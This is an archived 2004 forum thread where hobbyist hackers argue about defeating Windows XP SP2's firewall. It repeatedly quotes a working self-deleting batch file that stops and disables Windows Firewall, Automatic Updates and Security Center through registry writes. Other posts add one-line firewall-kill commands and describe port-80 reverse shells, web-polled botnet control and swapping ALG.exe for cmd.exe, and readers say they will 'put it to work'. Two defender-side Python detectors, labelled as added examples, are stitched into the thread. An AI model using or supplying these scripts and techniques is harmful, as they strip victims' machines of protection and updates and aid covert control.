You still are talking about the problems of writing drivers for unknown hardware and having them certified. I am not, I am talking about sitting on the upper edge interface of the existing driver and THAT'S why there's no problem with hardware compatibility, we're using a standard interface. You consistently fail to catch this point, maybe clarity is being lost in the heat of the argument.
That's because you seemed to change directions on me by first saying MS gave the tools to write our own drivers that can get around firewalls.
Original quote:
QUOTE
microsoft gave us an open architecture to (ab)use as we see fit. The horror of this is that we can take advantage of the published interfaces and write our own shims for the transport/service/namespace, either in the stack (good for some things, not so much for this) or below userland where the NDIS resides along with miniport drivers and the drivers themselves.
I know of no current way to do this that is going to offer any reasonable degree of stealth. After all, if someone is running even a simple IDS, all this work is for nothing. I don't speak for the firewall being any *more* stealthy, cause it isn't, but I do believe the batch file above is something any SP2 virus might include, which is why I stated as such in my original post.
QUOTE
As for internal packet monitoring and assuming that the first machine I meet is the only one I need to compromise, whacking a firewall suffers the same problem. I didn't sell this as a magic bullet, just as a better idea with less administrative noise.
It's the administrative noise part we disagree on then. I really think the same admin that would catch a service policy being disrupted would catch a network policy being disrupted with their IDS.
QUOTE
I didn't mention going to HIP last week. Yes, HIP is not running but I was there in '97 with Skee and a few others. I fail to get your point. I shall dig out some photos of myself at the event and scan them for you.
No need to. My point is that it was 1997. Are you familiar with the "management" features of current Cisco products? There's not much damage that can even be done with them anymore.
QUOTE
If you look at my first post in this thread I think you will see that I wasn't the one who made all this personal. But now you've got me so mad I'm venting all over the board and that's not good. For THAT and ONLY THAT I apologise.
My issue is not representative of GSO as a whole. It hasn't been the whole time. I was continuing our discussion from the last argument:
QUOTE
Now, even if I demonstrate my point you're just going to argue that it's not necessary and come up with a million problems, most of which will also apply to firewall killing. I cannot make any ground with you at all. So, I'll make a few CLEAR tutes on this and a few other little tricks and then I'm leaving the board. People are telling me I shouldn't waste my time with proofs but I feel I have to considering what is being said about me. So, you'll have my paper and then you can misinterpret, malign me and sit 'n' pull holes in every word till you're happy. I certainly won't hang around to answer to any of it, so knock yourself out.
You have knowledge, just share it rather than speaking in whatifs and sensationalizing.
QUOTE
At least then we won't have to suffer each other any longer : /
You don't have to leave the forum just because we had an argument. Just don't let my view bother you. People here are individuals enough that they are not going to take sides in our argument. In fact, I'm certain they agree with you on some of these issues about moving beyond scripting and getting into kernel-level modifications. I just don't think that the average person is even going to come close to grasping what you're talking about.
Still, using rootkits like HackerDefender is not beyond them, so if they get into some of the nitty gritty and learn to code because of it, it's all good.
Yorn
May 12 2004, 05:56 PM
QUOTE (vnet576 @ May 11 2004, 01:24 PM)
I'm going to interject here to point out an interesting but very simple technique for bypassing common network monitoring activity. Like Yorn mentioned, he doesn't monitor port 80 outgoing and neither do most sysops. That's why you basically make a reverse shell that will try to connect to a remote system and give them a command prompt on connection. The outgoing port you would use is 80, the http port.
Ahh.. but some admins *do* go that extra step to make sure that the connection starts with an HTTP GET request. Still, for the most part, what you are describing is EXACTLY what a careful hacker is going to do. I just don't see it important that they do it via a rootkit or via netcat/cryptcat.
vnet576
May 12 2004, 06:08 PM
I'm going to add something along with that. You mentioned botnets, well a similar principle can be applied to them. Rather than manage them through an irc server, whose port (6667) most sysops block, you can instead manage them through a website. Have the hacked boxes connect and check a particular website every x hours. Note that in this example port 80 and http get is used. On that website you will post specific commands for the bots themselves or for the system in general. For example the website could have entire lists of commands that each system will perform. A simple and virtually fool-proof method for managing large amounts of systems.
Sometimes the simple and low-tech approach is the best one. I have found when programming for windows that programs would just not work or apis would not run for specific versions of OSs. That's why I tend to use the most low-tech means possible of achieving the desired result.
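Two defender-side checks for the tactics in the posts above, written as an added example (this is not code from the thread or from any poster). The first implements the extra step Yorn mentions, checking that a client's opening bytes on port 80 really are an HTTP request line, which catches a command prompt piped out over port 80. The second looks for a host that fetches the same URL at a near-constant interval, which is what the "check a website every x hours" control scheme looks like from the network side. The connection records, host names, addresses and timestamps are constructed for the example.

```python
"""Defender-side checks for outbound TCP/80 abuse: non-HTTP payloads on the
web port, and fixed-interval polling of one destination.

Added example, not code from the thread. SAMPLE_RECORDS is constructed.
"""
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# RFC 2616 request line: Method SP Request-URI SP HTTP-Version CRLF.
# A client whose first bytes on port 80 do not match this is not a browser.
_REQUEST_LINE = re.compile(
    rb"^(?:GET|POST|HEAD|PUT|DELETE|OPTIONS|TRACE|CONNECT) \S+ HTTP/1\.[01]\r\n"
)

# Constructed records: (ISO timestamp, source host, destination, dport, first client bytes).
# ws-17 is a user browsing; its 18:00:05 connection is a cmd.exe prompt sent out over port 80.
# ws-23 fetches the same file once an hour, the web-based bot control scheme described above.
SAMPLE_RECORDS = [
    ("2004-05-12T18:00:00", "ws-17", "203.0.113.10", 80, b"GET / HTTP/1.1\r\nHost: www.example.com\r\n"),
    ("2004-05-12T18:00:05", "ws-17", "192.0.2.44", 80, b"Microsoft Windows XP [Version 5.1.2600]\r\n"),
    ("2004-05-12T18:00:07", "ws-17", "203.0.113.10", 80, b"GET /news HTTP/1.1\r\nHost: www.example.com\r\n"),
    ("2004-05-12T18:03:41", "ws-17", "203.0.113.10", 80, b"GET /a.gif HTTP/1.1\r\nHost: www.example.com\r\n"),
    ("2004-05-12T18:09:02", "ws-17", "203.0.113.10", 80, b"POST /login HTTP/1.1\r\nHost: www.example.com\r\n"),
    ("2004-05-12T10:00:00", "ws-23", "198.51.100.7", 80, b"GET /cmds.txt HTTP/1.0\r\n\r\n"),
    ("2004-05-12T11:00:02", "ws-23", "198.51.100.7", 80, b"GET /cmds.txt HTTP/1.0\r\n\r\n"),
    ("2004-05-12T12:00:00", "ws-23", "198.51.100.7", 80, b"GET /cmds.txt HTTP/1.0\r\n\r\n"),
    ("2004-05-12T13:00:02", "ws-23", "198.51.100.7", 80, b"GET /cmds.txt HTTP/1.0\r\n\r\n"),
    ("2004-05-12T14:00:00", "ws-23", "198.51.100.7", 80, b"GET /cmds.txt HTTP/1.0\r\n\r\n"),
]


def looks_like_http(first_bytes):
    """True if the client's opening bytes form a well-formed HTTP request line."""
    return _REQUEST_LINE.match(first_bytes) is not None


def non_http_on_web_ports(records, web_ports=(80,)):
    """Return (timestamp, src, dst, dport) for web-port connections that do not start with HTTP."""
    return [
        (ts, src, dst, dport)
        for ts, src, dst, dport, first in records
        if dport in web_ports and not looks_like_http(first)
    ]


def beacon_candidates(records, min_hits=4, max_cv=0.1):
    """Return ((src, dst, dport), mean_gap_seconds, cv) for pairs contacted at
    near-constant intervals. cv is the coefficient of variation of the gaps
    between consecutive connections; a browsing user produces a large cv,
    a scheduled poll a very small one."""
    by_pair = defaultdict(list)
    for ts, src, dst, dport, _ in records:
        by_pair[(src, dst, dport)].append(datetime.fromisoformat(ts))
    found = []
    for pair, times in by_pair.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue  # identical timestamps carry no interval information
        cv = pstdev(gaps) / avg
        if cv <= max_cv:
            found.append((pair, round(avg), round(cv, 3)))
    return found


if __name__ == "__main__":
    for hit in non_http_on_web_ports(SAMPLE_RECORDS):
        print("non-HTTP client on web port:", hit)
    for pair, avg, cv in beacon_candidates(SAMPLE_RECORDS):
        print("regular polling: %s every ~%ds (cv=%.3f)" % (pair, avg, cv))
```

The two checks are complementary: the polling bot speaks perfectly valid HTTP and passes the first check, and the reverse shell connects once and passes the second. The interval check is a triage signal rather than a verdict, since update agents and time clients also poll on a schedule, so the thresholds need tuning against the traffic you actually see.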
147111
May 20 2004, 12:29 PM
i think the service name is wrong in the batch file..
i have disabled windows firewall many times using net stop.
the command i always used was:
NET STOP "Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS)"
correct me if i'm wrong
F34R
May 20 2004, 12:45 PM
hmm... good information nonetheless even if it is scattered...
blade1310
May 20 2004, 02:46 PM
thanx man, good info here gonna put it to work
toska
May 20 2004, 10:11 PM
very nice!!!
147111
May 21 2004, 02:29 PM
pip, what did that have to do with my post? lol
yeah, i just wouldn't trust it, microsoft isn't exactly known for their security services
Yorn
Jun 16 2004, 04:29 AM
QUOTE (147111 @ May 20 2004, 06:29 AM)
i think the service name is wrong in the batch file..
i have disabled windows firewall many times using net stop.
the command i always used was:
NET STOP "Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS)"
correct me if i'm wrong
You're not entirely wrong, that is for Windows XP and XP SP1. With SP2, you have to use the script that I first posted.
UltraCool
Jun 16 2004, 07:05 AM
Well this looks very interesting, gonna test on my other computer and see if it works.
Thnx a lot for sharing this information with us
Uc
ghost_c
Jun 16 2004, 12:17 PM
Xmmm ... Windows 2003 Server
[62.63.64.65] NETBIOS/SMB is not enabled on this computer.
Resolving 62.63.64.65...
UDP scanning thread started ...
Resolved as : thatstheway
TCP scanning started ...
UDP scanning thread stopped.
Operating System : Windows
Scan completed in 5 seconds.
Tcp port open : 0
2 Udp ports open :
123 [ NTP => Network Time Protocol ]
445 [ Microsoft CIFS => Common Internet File System ]
Kaspersky Anti-Hacker
(S)
Sep 7 2004, 02:24 AM
QUOTE (Yorn @ Apr 12 2004, 04:57 PM)
Last Update: 5-10-2004 I can assure you the first virus to be released following SP2's inception will contain something similar to the following:
KillFirewall.bat
CODE
@echo off
net stop "Security Center"
net stop SharedAccess > "%Temp%.\kill.reg"
ECHO REGEDIT4 >>"%Temp%.\kill.reg"
ECHO. >>"%Temp%.\kill.reg"
ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess] >>"%Temp%.\kill.reg"
ECHO "Start"=dword:00000004 >>"%Temp%.\kill.reg"
ECHO. >>"%Temp%.\kill.reg"
ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv] >>"%Temp%.\kill.reg"
ECHO "Start"=dword:00000004 >>"%Temp%.\kill.reg"
ECHO. >>"%Temp%.\kill.reg"
ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc] >>"%Temp%.\kill.reg"
ECHO "Start"=dword:00000004 >>"%Temp%.\kill.reg"
ECHO.
START /WAIT REGEDIT /S "%Temp%.\kill.reg"
DEL "%Temp%.\kill.reg"
DEL %0
Shuts down Windows Firewall, disables Automatic Updates for the next reboot.
And no, Microsoft is not going to fix this. This code will work when it goes live. WTG MS!
4-24-2004 EDIT: Added "DEL %0" at the request of illwill to delete the batch file itself.
5-7-2004 EDIT: Changed to "net stop SharedAccess" as indicated by int23h
5-10-2004 EDIT: Okay. Microsoft added another service after my first post and I didn't even notice it. Looks like it is time to disable that too. Modified the code to reflect that.
everyone here is there to learn and to help....if you can't help without insulting, don't answer....
It's not as if the mistake was so easy to find, nor was it asked several times in the past
(S)
Sep 7 2004, 03:53 AM
QUOTE (mortello @ Sep 6 2004, 10:17 PM)
No need to tell him he is a newbie....
everyone here is there to learn and to help....if you can't help without insulting, don't answer....
It's not as if the mistake was so easy to find, nor was it asked several times in the past
I want to know, is it wrong??? You were never a newbie???
Serhat
Sep 7 2004, 05:10 AM
%temp% is the temp directory, yes.. try it... cd %temp% .. and see where you get.. this is in case the temp directory is in another dir ... so you can still install all the stuff (in this case echo the regkeys and run them)... or just type 'set' in the command prompt to see more 'variables' like this one
And no, no newbie... like mortelle said he is here to help.. that you don't understand the stuff he writes down could happen.. but that doesn't make him a newbie. Then again, it seems he pasted the end of the stuff @ the start of the line
Serhat
(S)
Sep 7 2004, 05:46 AM
QUOTE (Serhat @ Sep 7 2004, 12:10 AM)
%temp% is the temp directory, yes.. try it... cd %temp% .. and see where you get.. this is in case the temp directory is in another dir ... so you can still install all the stuff (in this case echo the regkeys and run them)... or just type 'set' in the command prompt to see more 'variables' like this one
And no, no newbie... like mortelle said he is here to help.. that you don't understand the stuff he writes down could happen.. but that doesn't make him a newbie. Then again, it seems he pasted the end of the stuff @ the start of the line
Serhat
Sorry mortello Thanks to Serhat
dagg3r
Sep 18 2004, 11:16 AM
May I ask something? I might be wrong but I want to clarify something.
I have Windows XP SP1 and from what I did, I used pskill or one of those process killers to kill ALG.exe, then I copied CMD.exe to ALG.exe in system32 and changed the attributes to +RASH. Upon restarting, the windows firewall doesn't work, as in you can enable/disable it but it doesn't seem to work. Does ALG.exe control the windows xp firewall? And would this work on windows xp sp 2?
strasharo
Sep 19 2004, 10:19 AM
QUOTE (Yorn @ Apr 12 2004, 09:57 PM)
Last Update: 5-10-2004 I can assure you the first virus to be released following SP2's inception will contain something similar to the following:
KillFirewall.bat
CODE
@echo off
net stop "Security Center"
net stop SharedAccess > "%Temp%.\kill.reg"
ECHO REGEDIT4 >>"%Temp%.\kill.reg"
ECHO. >>"%Temp%.\kill.reg"
ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess] >>"%Temp%.\kill.reg"
ECHO "Start"=dword:00000004 >>"%Temp%.\kill.reg"
ECHO. >>"%Temp%.\kill.reg"
ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv] >>"%Temp%.\kill.reg"
ECHO "Start"=dword:00000004 >>"%Temp%.\kill.reg"
ECHO. >>"%Temp%.\kill.reg"
ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc] >>"%Temp%.\kill.reg"
ECHO "Start"=dword:00000004 >>"%Temp%.\kill.reg"
ECHO.
START /WAIT REGEDIT /S "%Temp%.\kill.reg"
DEL "%Temp%.\kill.reg"
DEL %0
Shuts down Windows Firewall, disables Automatic Updates for the next reboot.
And no, Microsoft is not going to fix this. This code will work when it goes live. WTG MS!
4-24-2004 EDIT: Added "DEL %0" at the request of illwill to delete the batch file itself.
5-7-2004 EDIT: Changed to "net stop SharedAccess" as indicated by int23h
5-10-2004 EDIT: Okay. Microsoft added another service after my first post and I didn't even notice it. Looks like it is time to disable that too. Modified the code to reflect that.
Well Yorn, but isn't it much easier to do something like this?
Isn't this a lot easier instead of writing a bunch of reg stuff? It does exactly the same work. Erm, in win2k sc.exe isn't included by default but in XP it is, so your batch may be handy with win2k but we are talking about XP.
Have a nice day!
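Whether the services are disabled with the .reg import in Yorn's batch file or with sc.exe as strasharo suggests, the end state is the same: the Start value of SharedAccess, wuauserv and wscsvc under the Services key is set to 4 (Disabled). The audit below, an added example that is not code from the thread or from any poster, parses a .reg export in the REGEDIT4 format the batch file writes and reports watched services whose Start value departs from a baseline. The baseline values (2 = Automatic for all three) are an assumption for a default XP SP2 install, and the sample .reg text is constructed to look like the kill.reg the batch leaves in %Temp%, including the net stop output that lands in front of the header.

```python
"""Audit a Windows .reg export for security services set to Disabled (Start=4).

Added example, not code from the thread. WATCHED_SERVICES baselines are an
assumption for a default XP SP2 install; SAMPLE_REG is constructed.
"""
import re

# Service Start values: 0 Boot, 1 System, 2 Automatic, 3 Manual, 4 Disabled.
START_NAMES = {0: "Boot", 1: "System", 2: "Automatic", 3: "Manual", 4: "Disabled"}

# The three services the batch file above disables, with their expected Start value.
WATCHED_SERVICES = {
    "SharedAccess": 2,  # Windows Firewall / Internet Connection Sharing
    "wuauserv": 2,      # Automatic Updates
    "wscsvc": 2,        # Security Center
}

_KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]\s*$")
_DWORD_RE = re.compile(r'^"(?P<name>[^"]+)"=dword:(?P<val>[0-9a-fA-F]{8})\s*$')
# Accept both CurrentControlSet and ControlSetNNN: the batch file mixes the two.
_SERVICE_RE = re.compile(
    r"^HKEY_LOCAL_MACHINE\\SYSTEM\\(?:CurrentControlSet|ControlSet\d{3})\\Services\\(?P<svc>[^\\]+)$",
    re.IGNORECASE,
)


def parse_reg(text):
    """Return {key_path: {value_name: int}} for the dword values in a .reg file.
    Nothing before the REGEDIT4 / 5.00 header line is parsed, so stray command
    output written ahead of the header is ignored rather than misread."""
    result = {}
    current = None
    seen_header = False
    for raw in text.splitlines():
        line = raw.strip()
        if not seen_header:
            seen_header = line in ("REGEDIT4", "Windows Registry Editor Version 5.00")
            continue
        m = _KEY_RE.match(line)
        if m:
            current = m.group("key")
            result.setdefault(current, {})
            continue
        m = _DWORD_RE.match(line)
        if m and current is not None:
            result[current][m.group("name")] = int(m.group("val"), 16)
    return result


def find_tampered_services(text, watched=WATCHED_SERVICES):
    """Return sorted (service, start_value) pairs for watched services whose
    Start value in the .reg text differs from the expected baseline."""
    findings = {}
    for key, values in parse_reg(text).items():
        m = _SERVICE_RE.match(key)
        if not m or "Start" not in values:
            continue
        svc = m.group("svc")
        for name, expected in watched.items():
            if name.lower() == svc.lower() and values["Start"] != expected:
                findings[name] = values["Start"]
    return sorted(findings.items())


def describe(findings):
    """Render findings as one report line per service."""
    return ["%s: Start=%d (%s)" % (svc, val, START_NAMES.get(val, "unknown"))
            for svc, val in findings]


# Constructed sample: what the batch file above leaves in %Temp%\kill.reg.
# The two lines before REGEDIT4 imitate the redirected 'net stop' output.
SAMPLE_REG = """The Windows Firewall/Internet Connection Sharing (ICS) service is stopping.
The Windows Firewall/Internet Connection Sharing (ICS) service was stopped successfully.
REGEDIT4

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess]
"Start"=dword:00000004

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\wuauserv]
"Start"=dword:00000004

[HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\wscsvc]
"Start"=dword:00000004
"""

if __name__ == "__main__":
    for line in describe(find_tampered_services(SAMPLE_REG)):
        print(line)
```

On a live machine the same comparison can be made against the registry itself or against `sc qc` output for each service, and the fix is to set Start back to the baseline and start the three services again; on SP2 the firewall can also be switched back on with `netsh firewall set opmode enable`.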
Yorn
Sep 23 2004, 06:50 PM
Guys, I encourage you to check out the date on this. This was written about 6 months before SP2 even came out. They have since added a lot more functionality making Security Center even easier to shut down.
Train25
Sep 24 2004, 01:20 AM
Didn't really read the posts through but I know this command will disable the firewall completely
netsh firewall opmode disable
strasharo
Sep 25 2004, 02:09 AM
QUOTE (Train25 @ Sep 24 2004, 01:20 AM)
Didn't really read the posts through but I know this command will disable the firewall completely
netsh firewall opmode disable
Just a little correction, you have missed one "set"; the proper command is
netsh firewall set opmode disable
That's it!
Have a nice day!
Train25
Sep 25 2004, 05:16 AM
QUOTE (strasharo @ Sep 24 2004, 10:09 PM)
Just a little correction, you have missed one "set"; the proper command is
netsh firewall set opmode disable
That's it!
Have a nice day!
you are absolutely correct.
losted
Oct 2 2004, 09:40 PM
thx for the share
I will try it